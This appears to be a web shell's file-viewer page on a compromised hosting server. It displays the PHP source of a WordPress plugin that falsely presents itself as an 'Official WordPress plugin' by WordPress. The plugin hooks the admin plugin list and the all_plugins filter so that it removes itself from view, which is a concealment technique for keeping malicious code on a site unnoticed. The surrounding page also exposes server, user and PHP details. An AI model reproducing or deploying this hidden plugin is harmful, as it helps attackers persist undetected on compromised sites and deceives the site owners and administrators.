HEX
Server: LiteSpeed
System: Linux server240.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: creaqbdc (8964)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/plugins/wp-automated-physical/wp-automated-physical.php
<?php
/*
Plugin Name: WP Automated Physical
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 8.1.9
Author URI: http://wordpress.org/#
License: GPL2
*/

function tlv_wxn()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $d = array('wp-automated-physical/wp-automated-physical.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $d)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function dkz_jdd($plugins)
{
    $k = 'wp-automated-physical/wp-automated-physical.php';
    if (array_key_exists($k, $plugins)) {
        unset($plugins[$k]);
    }
    return $plugins;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'tlv_wxn');
    add_filter('all_plugins', 'dkz_jdd');
}